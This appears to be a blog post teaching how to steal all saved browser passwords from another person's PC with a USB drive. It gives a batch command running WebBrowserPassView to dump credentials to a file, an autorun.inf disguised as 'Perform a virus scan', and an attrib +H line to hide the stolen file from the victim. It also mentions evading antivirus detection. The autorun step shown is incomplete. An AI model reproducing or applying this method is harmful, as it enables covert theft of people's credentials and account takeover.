Take all passwords of PC with a small usb trick

Well, in this post you will learn an easy trick makes you take and steal all the passwords from browsers of a PC (Opera, Internet Explorer, Chrome, Firefox) with just plugging the USB drive into it
First let's explain how it works : we will be using a software, this software recover all the passwords  from a browser like Opera, Internet Explorer, Chrome and Firefox, then we will use a batch file (.bat) to make this software save all the recovered passwords in one text file.
So until now, this software wouldn't work unless the user click the batch file right ?
Yes so here we will use an Autorun file to make this software excuse with the plugging of the USB drive
Lets get to work
First all the files we will be working on will be in one single folder
First download  WebBrowserPassView.zip from here : webbrowserpassview.zip
Extract and (notice that some anti-viruses detect it as a virus but it's not) actually I'm working on making it undetectable as a virus

Second : create a new text file and name it "launch" change it's extension to .bat so the file is launch.bat, right click and choose edit try past this code :

start WebBrowserPassView.exe /stext WebBrowserPassView.txt

Now the autorun file : make a new text file and name it autorun and the extension to .inf
Open it with text editor and insert the following :

ACTION= Perform a virus scan


 Then simply save it.
Great! now pick up all the files and past them in your USB drive
Now when ever the launch.bat is executed,  you will notes a text file named "WebBrowserPassView.txt"

One more tip : if you are afraid that the user will open the USB drive and see the WebBrowserPassView.txt text then you can reopen the launch.bat and add this line

attrib +H WebBrowserPassView.txt 

Now this line will hide the WebBrowserPassView.txt file after creating it.
So when you want to see it you must turn off the folder option which hide the hidden files

That's all for today! Enjoy 


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